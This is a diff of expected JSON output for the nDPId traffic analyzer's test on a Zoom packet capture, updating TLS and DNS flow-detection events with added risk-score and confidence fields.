-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"}
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01234{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01233{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01234{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
-01233{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569520471147,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1569520471147,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCtGEAAP8Rg4LAqAF1wKgBAcfxADUALsLBHCQBAAABAAAAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569520471188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1569520471188,"pkt":"KDc3AG3IEBMx8Tl2CABFAABSclkAADcRjXvAqAEBwKgBdQA1x\/EAPsuKHCSBgAABAAEAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAHADAABAAEAAKjAAARtXqBj"}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}}
